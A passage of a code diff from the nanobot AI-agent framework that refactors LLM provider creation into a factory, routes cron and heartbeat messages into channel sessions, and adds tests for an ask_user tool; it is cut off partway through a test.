async def _print_interactive_progress_line(text: str, thinking: ThinkingSpinner | None) -> None:
"""Print an interactive progress line, pausing the spinner if needed."""
if not text.strip():
return
with thinking.pause() if thinking else nullcontext():
await _print_interactive_line(text)
@ -408,73 +412,13 @@ def _make_provider(config: Config):
Routing is driven by ``ProviderSpec.backend`` in the registry.
"""
from nanobot.providers.base import GenerationSettings
from nanobot.providers.registry import find_by_name
from nanobot.providers.factory import make_provider
model = config.agents.defaults.model
provider_name = config.get_provider_name(model)
p = config.get_provider(model)
spec = find_by_name(provider_name) if provider_name else None
backend = spec.backend if spec else "openai_compat"
# --- validation ---
if backend == "azure_openai":
if not p or not p.api_key or not p.api_base:
console.print("[red]Error: Azure OpenAI requires api_key and api_base.[/red]")
console.print("Set them in ~/.nanobot/config.json under providers.azure_openai section")
console.print("Use the model field to specify the deployment name.")
raise typer.Exit(1)
elif backend == "openai_compat" and not model.startswith("bedrock/"):
needs_key = not (p and p.api_key)
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
if needs_key and not exempt:
console.print("[red]Error: No API key configured.[/red]")
console.print("Set one in ~/.nanobot/config.json under providers section")
raise typer.Exit(1)
# --- instantiation by backend ---
if backend == "openai_codex":
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
provider = OpenAICodexProvider(default_model=model)
elif backend == "azure_openai":
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
provider = AzureOpenAIProvider(
api_key=p.api_key,
api_base=p.api_base,
default_model=model,
)
elif backend == "github_copilot":
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
provider = GitHubCopilotProvider(default_model=model)
elif backend == "anthropic":
from nanobot.providers.anthropic_provider import AnthropicProvider
provider = AnthropicProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
)
else:
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
provider = OpenAICompatProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
spec=spec,
)
defaults = config.agents.defaults
provider.generation = GenerationSettings(
temperature=defaults.temperature,
max_tokens=defaults.max_tokens,
reasoning_effort=defaults.reasoning_effort,
)
return provider
try:
return make_provider(config)
except ValueError as exc:
console.print(f"[red]Error: {exc}[/red]")
raise typer.Exit(1) from exc
def _load_runtime_config(config: str | None = None, workspace: str | None = None) -> Config:
@ -593,6 +537,7 @@ def serve(
unified_session=runtime_config.agents.defaults.unified_session,
disabled_skills=runtime_config.agents.defaults.disabled_skills,
session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes,
consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio,
tools_config=runtime_config.tools,
)
@ -652,11 +597,14 @@ def _run_gateway(
) -> None:
"""Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up."""
from nanobot.agent.loop import AgentLoop
from nanobot.agent.tools.cron import CronTool
from nanobot.agent.tools.message import MessageTool
from nanobot.bus.queue import MessageBus
from nanobot.channels.manager import ChannelManager
from nanobot.cron.service import CronService
from nanobot.cron.types import CronJob
from nanobot.heartbeat.service import HeartbeatService
from nanobot.providers.factory import build_provider_snapshot, load_provider_snapshot
from nanobot.session.manager import SessionManager
port = port if port is not None else config.gateway.port
@ -664,7 +612,12 @@ def _run_gateway(
console.print(f"{__logo__} Starting nanobot gateway version {__version__} on port {port}...")
sync_workspace_templates(config.workspace_path)
bus = MessageBus()
provider = _make_provider(config)
try:
provider_snapshot = build_provider_snapshot(config)
except ValueError as exc:
console.print(f"[red]Error: {exc}[/red]")
raise typer.Exit(1) from exc
provider = provider_snapshot.provider
session_manager = SessionManager(config.workspace_path)
# Preserve existing single-workspace installs, but keep custom workspaces clean.
@ -680,9 +633,9 @@ def _run_gateway(
bus=bus,
provider=provider,
workspace=config.workspace_path,
model=config.agents.defaults.model,
model=provider_snapshot.model,
max_iterations=config.agents.defaults.max_tool_iterations,
context_window_tokens=config.agents.defaults.context_window_tokens,
context_window_tokens=provider_snapshot.context_window_tokens,
web_config=config.tools.web,
context_block_limit=config.agents.defaults.context_block_limit,
max_tool_result_chars=config.agents.defaults.max_tool_result_chars,
@ -697,9 +650,55 @@ def _run_gateway(
unified_session=config.agents.defaults.unified_session,
disabled_skills=config.agents.defaults.disabled_skills,
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
consolidation_ratio=config.agents.defaults.consolidation_ratio,
tools_config=config.tools,
provider_snapshot_loader=load_provider_snapshot,
provider_signature=provider_snapshot.signature,
)
from nanobot.agent.loop import UNIFIED_SESSION_KEY
from nanobot.bus.events import OutboundMessage
def _channel_session_key(channel: str, chat_id: str) -> str:
return (
UNIFIED_SESSION_KEY
if config.agents.defaults.unified_session
else f"{channel}:{chat_id}"
)
async def _deliver_to_channel(
msg: OutboundMessage, *, record: bool = False, session_key: str | None = None,
) -> None:
"""Publish a user-visible message and mirror it into that channel's session."""
metadata = dict(msg.metadata or {})
record = record or bool(metadata.pop("_record_channel_delivery", False))
if metadata != (msg.metadata or {}):
msg = OutboundMessage(
channel=msg.channel,
chat_id=msg.chat_id,
content=msg.content,
reply_to=msg.reply_to,
media=msg.media,
metadata=metadata,
buttons=msg.buttons,
)
if (
record
and msg.channel != "cli"
and msg.content.strip()
and hasattr(session_manager, "get_or_create")
and hasattr(session_manager, "save")
):
key = session_key or _channel_session_key(msg.channel, msg.chat_id)
session = session_manager.get_or_create(key)
session.add_message("assistant", msg.content, _channel_delivery=True)
session_manager.save(session)
await bus.publish_outbound(msg)
message_tool = getattr(agent, "tools", {}).get("message")
if isinstance(message_tool, MessageTool):
message_tool.set_send_callback(_deliver_to_channel)
# Set cron callback (needs agent)
async def on_cron_job(job: CronJob) -> str | None:
"""Execute a cron job through the agent."""
@ -712,14 +711,14 @@ def _run_gateway(
logger.exception("Dream cron job failed")
return None
from nanobot.agent.tools.cron import CronTool
from nanobot.agent.tools.message import MessageTool
from nanobot.utils.evaluator import evaluate_response
reminder_note = (
"[Scheduled Task] Timer finished.\n\n"
f"Task '{job.name}' has been triggered.\n"
f"Scheduled instruction: {job.payload.message}"
"The scheduled time has arrived. Deliver this reminder to the user now, "
"as a brief and natural message in their language. Speak directly to them — "
"do not narrate progress, summarize, include user IDs, or add status reports "
"like 'Done' or 'Reminded'.\n\n"
f"Reminder: {job.payload.message}"
)
cron_tool = agent.tools.get("cron")
@ -730,6 +729,10 @@ def _run_gateway(
async def _silent(*_args, **_kwargs):
pass
message_record_token = None
if isinstance(message_tool, MessageTool):
message_record_token = message_tool.set_record_channel_delivery(True)
try:
resp = await agent.process_direct(
reminder_note,
@ -741,10 +744,11 @@ def _run_gateway(
finally:
if isinstance(cron_tool, CronTool) and cron_token is not None:
cron_tool.reset_cron_context(cron_token)
if isinstance(message_tool, MessageTool) and message_record_token is not None:
message_tool.reset_record_channel_delivery(message_record_token)
response = resp.content if resp else ""
message_tool = agent.tools.get("message")
if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn:
return response
@ -753,12 +757,16 @@ def _run_gateway(
response, reminder_note, provider, agent.model,
)
if should_notify:
from nanobot.bus.events import OutboundMessage
await bus.publish_outbound(OutboundMessage(
channel=job.payload.channel or "cli",
chat_id=job.payload.to,
content=response,
))
await _deliver_to_channel(
OutboundMessage(
channel=job.payload.channel or "cli",
chat_id=job.payload.to,
content=response,
metadata=dict(job.payload.channel_meta),
),
record=True,
session_key=job.payload.session_key,
)
return response
cron.on_job = on_cron_job
@ -808,12 +816,22 @@ def _run_gateway(
return resp.content if resp else ""
async def on_heartbeat_notify(response: str) -> None:
"""Deliver a heartbeat response to the user's channel."""
from nanobot.bus.events import OutboundMessage
"""Deliver a heartbeat response to the user's channel.
In addition to publishing the outbound message, this injects the
delivered text as an assistant turn into the *target channel's*
session. Without this, a user reply on the channel (e.g. "Sure")
lands in a session that has no context about the heartbeat message
and the agent cannot follow through.
"""
channel, chat_id = _pick_heartbeat_target()
if channel == "cli":
return # No external channel available to deliver to
await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response))
await _deliver_to_channel(
OutboundMessage(channel=channel, chat_id=chat_id, content=response),
record=True,
)
hb_cfg = config.gateway.heartbeat
heartbeat = HeartbeatService(
@ -1016,6 +1034,7 @@ def agent(
unified_session=config.agents.defaults.unified_session,
disabled_skills=config.agents.defaults.disabled_skills,
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
consolidation_ratio=config.agents.defaults.consolidation_ratio,
tools_config=config.tools,
)
restart_notice = consume_restart_notice_from_env()

View File

@ -28,7 +28,11 @@ async def cmd_stop(ctx: CommandContext) -> OutboundMessage:
async def cmd_restart(ctx: CommandContext) -> OutboundMessage:
"""Restart the process in-place via os.execv."""
msg = ctx.msg
set_restart_notice_to_env(channel=msg.channel, chat_id=msg.chat_id)
set_restart_notice_to_env(
channel=msg.channel,
chat_id=msg.chat_id,
metadata=dict(msg.metadata or {}),
)
async def _do_restart():
await asyncio.sleep(1)

View File

@ -90,6 +90,13 @@ class AgentDefaults(Base):
validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"),
serialization_alias="idleCompactAfterMinutes",
) # Auto-compact idle threshold in minutes (0 = disabled)
consolidation_ratio: float = Field(
default=0.5,
ge=0.1,
le=0.95,
validation_alias=AliasChoices("consolidationRatio"),
serialization_alias="consolidationRatio",
) # Consolidation target ratio (0.5 = 50% of budget retained after compression)
dream: DreamConfig = Field(default_factory=DreamConfig)

View File

@ -109,6 +109,12 @@ class CronService:
deliver=j["payload"].get("deliver", False),
channel=j["payload"].get("channel"),
to=j["payload"].get("to"),
channel_meta=(
j["payload"].get("channelMeta")
or j["payload"].get("channel_meta")
or {}
),
session_key=j["payload"].get("sessionKey") or j["payload"].get("session_key"),
),
state=CronJobState(
next_run_at_ms=j.get("state", {}).get("nextRunAtMs"),
@ -210,6 +216,8 @@ class CronService:
"deliver": j.payload.deliver,
"channel": j.payload.channel,
"to": j.payload.to,
"channelMeta": j.payload.channel_meta,
"sessionKey": j.payload.session_key,
},
"state": {
"nextRunAtMs": j.state.next_run_at_ms,
@ -379,6 +387,8 @@ class CronService:
channel: str | None = None,
to: str | None = None,
delete_after_run: bool = False,
channel_meta: dict | None = None,
session_key: str | None = None,
) -> CronJob:
"""Add a new job."""
_validate_schedule_for_add(schedule)
@ -395,6 +405,8 @@ class CronService:
deliver=deliver,
channel=channel,
to=to,
channel_meta=channel_meta or {},
session_key=session_key,
),
state=CronJobState(next_run_at_ms=_compute_next_run(schedule, now)),
created_at_ms=now,

View File

@ -27,6 +27,8 @@ class CronPayload:
deliver: bool = False
channel: str | None = None # e.g. "whatsapp"
to: str | None = None # e.g. phone number
channel_meta: dict = field(default_factory=dict) # channel-specific routing (e.g. Slack thread_ts)
session_key: str | None = None # original session key for correct session recording
@dataclass

View File

@ -84,6 +84,7 @@ class Nanobot:
unified_session=defaults.unified_session,
disabled_skills=defaults.disabled_skills,
session_ttl_minutes=defaults.session_ttl_minutes,
consolidation_ratio=defaults.consolidation_ratio,
tools_config=config.tools,
)
return cls(loop)
@ -119,62 +120,6 @@ class Nanobot:
def _make_provider(config: Any) -> Any:
"""Create the LLM provider from config (extracted from CLI)."""
from nanobot.providers.base import GenerationSettings
from nanobot.providers.registry import find_by_name
from nanobot.providers.factory import make_provider
model = config.agents.defaults.model
provider_name = config.get_provider_name(model)
p = config.get_provider(model)
spec = find_by_name(provider_name) if provider_name else None
backend = spec.backend if spec else "openai_compat"
if backend == "azure_openai":
if not p or not p.api_key or not p.api_base:
raise ValueError("Azure OpenAI requires api_key and api_base in config.")
elif backend == "openai_compat" and not model.startswith("bedrock/"):
needs_key = not (p and p.api_key)
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
if needs_key and not exempt:
raise ValueError(f"No API key configured for provider '{provider_name}'.")
if backend == "openai_codex":
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
provider = OpenAICodexProvider(default_model=model)
elif backend == "github_copilot":
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
provider = GitHubCopilotProvider(default_model=model)
elif backend == "azure_openai":
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
provider = AzureOpenAIProvider(
api_key=p.api_key, api_base=p.api_base, default_model=model
)
elif backend == "anthropic":
from nanobot.providers.anthropic_provider import AnthropicProvider
provider = AnthropicProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
)
else:
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
provider = OpenAICompatProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
spec=spec,
)
defaults = config.agents.defaults
provider.generation = GenerationSettings(
temperature=defaults.temperature,
max_tokens=defaults.max_tokens,
reasoning_effort=defaults.reasoning_effort,
)
return provider
return make_provider(config)

View File

@ -0,0 +1,112 @@
"""Create LLM providers from config."""
from __future__ import annotations
from dataclasses import dataclass
from pathlib import Path
from nanobot.config.schema import Config
from nanobot.providers.base import GenerationSettings, LLMProvider
from nanobot.providers.registry import find_by_name
@dataclass(frozen=True)
class ProviderSnapshot:
provider: LLMProvider
model: str
context_window_tokens: int
signature: tuple[object, ...]
def make_provider(config: Config) -> LLMProvider:
"""Create the LLM provider implied by config."""
model = config.agents.defaults.model
provider_name = config.get_provider_name(model)
p = config.get_provider(model)
spec = find_by_name(provider_name) if provider_name else None
backend = spec.backend if spec else "openai_compat"
if backend == "azure_openai":
if not p or not p.api_key or not p.api_base:
raise ValueError("Azure OpenAI requires api_key and api_base in config.")
elif backend == "openai_compat" and not model.startswith("bedrock/"):
needs_key = not (p and p.api_key)
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
if needs_key and not exempt:
raise ValueError(f"No API key configured for provider '{provider_name}'.")
if backend == "openai_codex":
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
provider = OpenAICodexProvider(default_model=model)
elif backend == "azure_openai":
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
provider = AzureOpenAIProvider(
api_key=p.api_key,
api_base=p.api_base,
default_model=model,
)
elif backend == "github_copilot":
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
provider = GitHubCopilotProvider(default_model=model)
elif backend == "anthropic":
from nanobot.providers.anthropic_provider import AnthropicProvider
provider = AnthropicProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
)
else:
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
provider = OpenAICompatProvider(
api_key=p.api_key if p else None,
api_base=config.get_api_base(model),
default_model=model,
extra_headers=p.extra_headers if p else None,
spec=spec,
)
defaults = config.agents.defaults
provider.generation = GenerationSettings(
temperature=defaults.temperature,
max_tokens=defaults.max_tokens,
reasoning_effort=defaults.reasoning_effort,
)
return provider
def provider_signature(config: Config) -> tuple[object, ...]:
"""Return the config fields that affect the primary LLM provider."""
model = config.agents.defaults.model
defaults = config.agents.defaults
return (
model,
defaults.provider,
config.get_provider_name(model),
config.get_api_key(model),
config.get_api_base(model),
defaults.max_tokens,
defaults.temperature,
defaults.reasoning_effort,
defaults.context_window_tokens,
)
def build_provider_snapshot(config: Config) -> ProviderSnapshot:
return ProviderSnapshot(
provider=make_provider(config),
model=config.agents.defaults.model,
context_window_tokens=config.agents.defaults.context_window_tokens,
signature=provider_signature(config),
)
def load_provider_snapshot(config_path: Path | None = None) -> ProviderSnapshot:
from nanobot.config.loader import load_config, resolve_config_env_vars
return build_provider_snapshot(resolve_config_env_vars(load_config(config_path)))

View File

@ -3,17 +3,20 @@
from __future__ import annotations
import asyncio
import json
import hashlib
import importlib.util
import json
import os
import secrets
import string
import time
import uuid
from collections.abc import Awaitable, Callable
from ipaddress import ip_address
from typing import TYPE_CHECKING, Any
from urllib.parse import urlparse
import httpx
import json_repair
from loguru import logger
@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3
_RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes
def _is_local_endpoint(
spec: "ProviderSpec | None",
api_base: str | None,
) -> bool:
"""Return True when the endpoint is a local or LAN model server.
Matches either the provider spec's ``is_local`` flag or common private-
network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x,
172.16-31.x, Docker ``host.docker.internal``).
"""
if spec and spec.is_local:
return True
if not api_base:
return False
raw = api_base.strip().lower()
parsed = urlparse(raw if "://" in raw else f"//{raw}")
try:
host = parsed.hostname
except ValueError:
return False
if host in {"localhost", "host.docker.internal"}:
return True
if not host:
return False
try:
addr = ip_address(host)
except ValueError:
return False
return addr.is_loopback or addr.is_private
def _is_direct_openai_base(api_base: str | None) -> bool:
"""Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways."""
if not api_base:
@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider):
if extra_headers:
default_headers.update(extra_headers)
# Local model servers (Ollama, llama.cpp, vLLM) often close idle
# HTTP connections before the client-side keepalive expires. When
# two LLM calls happen seconds apart (e.g. heartbeat _decide then
# process_direct), the second call may grab a now-dead pooled
# connection, causing a transient APIConnectionError on every first
# attempt. Disabling keepalive for local endpoints avoids this by
# opening a fresh connection for each request, which is cheap on a
# LAN. Cloud providers benefit from keepalive, so we leave the
# default pool settings for them.
http_client: httpx.AsyncClient | None = None
if _is_local_endpoint(spec, effective_base):
http_client = httpx.AsyncClient(
limits=httpx.Limits(keepalive_expiry=0),
)
self._client = AsyncOpenAI(
api_key=api_key or "no-key",
base_url=effective_base,
default_headers=default_headers,
max_retries=0,
http_client=http_client,
)
# Responses API circuit breaker: skip after repeated failures,
@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider):
clean["tool_call_id"] = map_id(clean["tool_call_id"])
return self._enforce_role_alternation(sanitized)
def _drop_deepseek_incomplete_reasoning_history(
self,
messages: list[dict[str, Any]],
reasoning_effort: str | None,
) -> list[dict[str, Any]]:
if (
not self._spec
or self._spec.name != "deepseek"
or not reasoning_effort
or reasoning_effort.lower() == "none"
):
return messages
bad_idx = None
for idx, msg in enumerate(messages):
if (
msg.get("role") == "assistant"
and msg.get("tool_calls")
and not msg.get("reasoning_content")
):
bad_idx = idx
if bad_idx is None:
return messages
keep_from = None
for idx in range(bad_idx + 1, len(messages)):
if messages[idx].get("role") == "user":
keep_from = idx
break
if keep_from is None:
trimmed = messages[:bad_idx]
else:
prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"]
trimmed = prefix + messages[keep_from:]
logger.warning(
"Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content",
len(messages) - len(trimmed),
)
return trimmed
# ------------------------------------------------------------------
# Build kwargs
# ------------------------------------------------------------------
@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider):
if spec and spec.strip_model_prefix:
model_name = model_name.split("/")[-1]
messages = self._drop_deepseek_incomplete_reasoning_history(
messages,
reasoning_effort,
)
kwargs: dict[str, Any] = {
"model": model_name,
"messages": self._sanitize_messages(self._sanitize_empty_content(messages)),
@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider):
finish_reason = str(choice0.get("finish_reason") or "stop")
raw_tool_calls: list[Any] = []
# StepFun Plan: fallback to reasoning field when content is empty
if not content and msg0.get("reasoning"):
# StepFun: fallback to reasoning field when content is empty
if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content:
content = self._extract_text_content(msg0.get("reasoning"))
reasoning_content = msg0.get("reasoning_content")
if not reasoning_content and msg0.get("reasoning"):
@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider):
finish_reason = ch.finish_reason
if not content and m.content:
content = m.content
if not content and getattr(m, "reasoning", None):
if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content:
content = m.reasoning
tool_calls = []

View File

@ -71,6 +71,11 @@ class ProviderSpec:
# "reasoning_split" — {"reasoning_split": true/false} (MiniMax)
thinking_style: str = ""
# When True, treat the "reasoning" response field as formal content
# when "content" is empty. Only set this for providers (e.g. StepFun)
# whose API returns the actual answer in "reasoning" instead of "content".
reasoning_as_content: bool = False
@property
def label(self) -> str:
return self.display_name or self.name.title()
@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = (
display_name="Step Fun",
backend="openai_compat",
default_api_base="https://api.stepfun.com/v1",
reasoning_as_content=True,
),
# Xiaomi MIMO (小米): OpenAI-compatible API
ProviderSpec(

View File

@ -30,6 +30,32 @@ class Session:
metadata: dict[str, Any] = field(default_factory=dict)
last_consolidated: int = 0 # Number of messages already consolidated to files
@staticmethod
def _annotate_message_time(message: dict[str, Any], content: Any) -> Any:
"""Expose persisted turn timestamps to the model for relative-date reasoning.
Annotating *every* assistant turn trains the model (via in-context
demonstrations) to start its own replies with the same
``[Message Time: ...]`` prefix, which leaks metadata back to the user.
We therefore only annotate:
* ``user`` turns needed so the model can pin the conversation in time.
* proactive deliveries (``_channel_delivery=True``) cron / heartbeat
assistant pushes that may sit hours away from the next user reply,
and are too infrequent to act as parroting demonstrations.
"""
timestamp = message.get("timestamp")
if not timestamp or not isinstance(content, str):
return content
role = message.get("role")
if role == "user":
pass
elif role == "assistant" and message.get("_channel_delivery"):
pass
else:
return content
return f"[Message Time: {timestamp}]\n{content}"
def add_message(self, role: str, content: str, **kwargs: Any) -> None:
"""Add a message to the session."""
msg = {
@ -41,15 +67,24 @@ class Session:
self.messages.append(msg)
self.updated_at = datetime.now()
def get_history(self, max_messages: int = 500) -> list[dict[str, Any]]:
def get_history(
self,
max_messages: int = 500,
*,
include_timestamps: bool = False,
) -> list[dict[str, Any]]:
"""Return unconsolidated messages for LLM input, aligned to a legal tool-call boundary."""
unconsolidated = self.messages[self.last_consolidated:]
sliced = unconsolidated[-max_messages:]
# Avoid starting mid-turn when possible.
# Avoid starting mid-turn when possible, except for proactive
# assistant deliveries that the user may be replying to.
for i, message in enumerate(sliced):
if message.get("role") == "user":
sliced = sliced[i:]
start = i
if i > 0 and sliced[i - 1].get("_channel_delivery"):
start = i - 1
sliced = sliced[start:]
break
# Drop orphan tool results at the front.
@ -71,6 +106,8 @@ class Session:
image_placeholder_text(p) for p in media if isinstance(p, str) and p
)
content = f"{content}\n{breadcrumbs}" if content else breadcrumbs
if include_timestamps:
content = self._annotate_message_time(message, content)
entry: dict[str, Any] = {"role": message["role"], "content": content}
for key in ("tool_calls", "tool_call_id", "name", "reasoning_content"):
if key in message:

View File

@ -2,12 +2,15 @@
from __future__ import annotations
import json
import os
import time
from dataclasses import dataclass
from dataclasses import dataclass, field
from typing import Any
RESTART_NOTIFY_CHANNEL_ENV = "NANOBOT_RESTART_NOTIFY_CHANNEL"
RESTART_NOTIFY_CHAT_ID_ENV = "NANOBOT_RESTART_NOTIFY_CHAT_ID"
RESTART_NOTIFY_METADATA_ENV = "NANOBOT_RESTART_NOTIFY_METADATA"
RESTART_STARTED_AT_ENV = "NANOBOT_RESTART_STARTED_AT"
@ -16,6 +19,7 @@ class RestartNotice:
channel: str
chat_id: str
started_at_raw: str
metadata: dict[str, Any] = field(default_factory=dict)
def format_restart_completed_message(started_at_raw: str) -> str:
@ -30,11 +34,20 @@ def format_restart_completed_message(started_at_raw: str) -> str:
return f"Restart completed{elapsed_suffix}."
def set_restart_notice_to_env(*, channel: str, chat_id: str) -> None:
def set_restart_notice_to_env(
*, channel: str, chat_id: str, metadata: dict[str, Any] | None = None,
) -> None:
"""Write restart notice env values for the next process."""
os.environ[RESTART_NOTIFY_CHANNEL_ENV] = channel
os.environ[RESTART_NOTIFY_CHAT_ID_ENV] = chat_id
os.environ[RESTART_STARTED_AT_ENV] = str(time.time())
if metadata:
try:
os.environ[RESTART_NOTIFY_METADATA_ENV] = json.dumps(metadata, default=str)
except (TypeError, ValueError):
os.environ.pop(RESTART_NOTIFY_METADATA_ENV, None)
else:
os.environ.pop(RESTART_NOTIFY_METADATA_ENV, None)
def consume_restart_notice_from_env() -> RestartNotice | None:
@ -42,9 +55,23 @@ def consume_restart_notice_from_env() -> RestartNotice | None:
channel = os.environ.pop(RESTART_NOTIFY_CHANNEL_ENV, "").strip()
chat_id = os.environ.pop(RESTART_NOTIFY_CHAT_ID_ENV, "").strip()
started_at_raw = os.environ.pop(RESTART_STARTED_AT_ENV, "").strip()
metadata_raw = os.environ.pop(RESTART_NOTIFY_METADATA_ENV, "").strip()
if not (channel and chat_id):
return None
return RestartNotice(channel=channel, chat_id=chat_id, started_at_raw=started_at_raw)
metadata: dict[str, Any] = {}
if metadata_raw:
try:
parsed = json.loads(metadata_raw)
except (TypeError, ValueError):
parsed = None
if isinstance(parsed, dict):
metadata = parsed
return RestartNotice(
channel=channel,
chat_id=chat_id,
started_at_raw=started_at_raw,
metadata=metadata,
)
def should_show_cli_restart_notice(notice: RestartNotice, session_id: str) -> bool:

View File

@ -0,0 +1,241 @@
import asyncio
from unittest.mock import MagicMock
import pytest
from nanobot.agent.loop import AgentLoop
from nanobot.agent.runner import AgentRunner, AgentRunSpec
from nanobot.agent.tools.ask import AskUserInterrupt, AskUserTool
from nanobot.agent.tools.base import Tool, tool_parameters
from nanobot.agent.tools.registry import ToolRegistry
from nanobot.agent.tools.schema import tool_parameters_schema
from nanobot.bus.events import InboundMessage
from nanobot.bus.queue import MessageBus
from nanobot.providers.base import GenerationSettings, LLMResponse, ToolCallRequest
def _make_provider(chat_with_retry):
async def chat_stream_with_retry(**kwargs):
kwargs.pop("on_content_delta", None)
return await chat_with_retry(**kwargs)
provider = MagicMock()
provider.get_default_model.return_value = "test-model"
provider.generation = GenerationSettings()
provider.chat_with_retry = chat_with_retry
provider.chat_stream_with_retry = chat_stream_with_retry
return provider
def test_ask_user_tool_schema_and_interrupt():
tool = AskUserTool()
schema = tool.to_schema()["function"]
assert schema["name"] == "ask_user"
assert "question" in schema["parameters"]["required"]
assert schema["parameters"]["properties"]["options"]["type"] == "array"
with pytest.raises(AskUserInterrupt) as exc:
asyncio.run(tool.execute("Continue?", options=["Yes", "No"]))
assert exc.value.question == "Continue?"
assert exc.value.options == ["Yes", "No"]
@pytest.mark.asyncio
async def test_runner_pauses_on_ask_user_without_executing_later_tools():
@tool_parameters(tool_parameters_schema(required=[]))
class LaterTool(Tool):
called = False
@property
def name(self) -> str:
return "later"
@property
def description(self) -> str:
return "Should not run after ask_user pauses the turn."
async def execute(self, **kwargs):
self.called = True
return "later result"
async def chat_with_retry(**kwargs):
return LLMResponse(
content="",
finish_reason="tool_calls",
tool_calls=[
ToolCallRequest(
id="call_ask",
name="ask_user",
arguments={"question": "Install this package?", "options": ["Yes", "No"]},
),
ToolCallRequest(id="call_later", name="later", arguments={}),
],
)
later = LaterTool()
tools = ToolRegistry()
tools.register(AskUserTool())
tools.register(later)
result = await AgentRunner(_make_provider(chat_with_retry)).run(AgentRunSpec(
initial_messages=[{"role": "user", "content": "continue"}],
tools=tools,
model="test-model",
max_iterations=3,
max_tool_result_chars=16_000,
concurrent_tools=True,
))
assert result.stop_reason == "ask_user"
assert result.final_content == "Install this package?"
assert "ask_user" in result.tools_used
assert later.called is False
assert result.messages[-1]["role"] == "assistant"
tool_calls = result.messages[-1]["tool_calls"]
assert [tool_call["function"]["name"] for tool_call in tool_calls] == ["ask_user"]
assert not any(message.get("name") == "ask_user" for message in result.messages)
@pytest.mark.asyncio
async def test_ask_user_text_fallback_resumes_with_next_message(tmp_path):
seen_messages: list[list[dict]] = []
async def chat_with_retry(**kwargs):
seen_messages.append(kwargs["messages"])
if len(seen_messages) == 1:
return LLMResponse(
content="",
finish_reason="tool_calls",
tool_calls=[
ToolCallRequest(
id="call_ask",
name="ask_user",
arguments={
"question": "Install the optional package?",
"options": ["Install", "Skip"],
},
)
],
)
return LLMResponse(content="Skipped install.", usage={})
loop = AgentLoop(
bus=MessageBus(),
provider=_make_provider(chat_with_retry),
workspace=tmp_path,
model="test-model",
)
async def on_stream(delta: str) -> None:
pass
async def on_stream_end(**kwargs) -> None:
pass
first = await loop._process_message(
InboundMessage(channel="cli", sender_id="user", chat_id="direct", content="set it up"),
on_stream=on_stream,
on_stream_end=on_stream_end,
)
assert first is not None
assert first.content == "Install the optional package?\n\n1. Install\n2. Skip"
assert first.buttons == []
assert "_streamed" not in first.metadata
session = loop.sessions.get_or_create("cli:direct")
assert any(message.get("role") == "assistant" and message.get("tool_calls") for message in session.messages)
assert not any(message.get("role") == "tool" and message.get("name") == "ask_user" for message in session.messages)
second = await loop._process_message(
InboundMessage(channel="cli", sender_id="user", chat_id="direct", content="Skip")
)
assert second is not None
assert second.content == "Skipped install."
assert any(
message.get("role") == "tool"
and message.get("name") == "ask_user"
and message.get("content") == "Skip"
for message in seen_messages[-1]
)
assert not any(
message.get("role") == "user" and message.get("content") == "Skip"
for message in session.messages
)
assert any(
message.get("role") == "tool"
and message.get("name") == "ask_user"
and message.get("content") == "Skip"
for message in session.messages
)
@pytest.mark.asyncio
async def test_ask_user_keeps_buttons_for_telegram(tmp_path):
async def chat_with_retry(**kwargs):
return LLMResponse(
content="",
finish_reason="tool_calls",
tool_calls=[
ToolCallRequest(
id="call_ask",
name="ask_user",
arguments={
"question": "Install the optional package?",
"options": ["Install", "Skip"],
},
)
],
)
loop = AgentLoop(
bus=MessageBus(),
provider=_make_provider(chat_with_retry),
workspace=tmp_path,
model="test-model",
)
response = await loop._process_message(
InboundMessage(channel="telegram", sender_id="user", chat_id="123", content="set it up")
)
assert response is not None
assert response.content == "Install the optional package?"
assert response.buttons == [["Install", "Skip"]]
@pytest.mark.asyncio
async def test_ask_user_keeps_buttons_for_websocket(tmp_path):
async def chat_with_retry(**kwargs):
return LLMResponse(
content="",
finish_reason="tool_calls",
tool_calls=[
ToolCallRequest(
